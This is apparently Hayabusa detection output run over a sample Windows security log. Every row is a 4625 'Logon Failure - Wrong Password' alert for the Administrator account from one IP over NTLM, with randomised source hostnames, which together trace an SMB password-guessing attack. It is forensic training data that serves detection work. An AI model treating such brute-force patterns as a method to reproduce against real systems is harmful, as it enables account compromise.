2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhLFXDMUKGfdoc4S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: apVAhc6o3dhLmUll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYMdQeB4ZpFm8xDh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
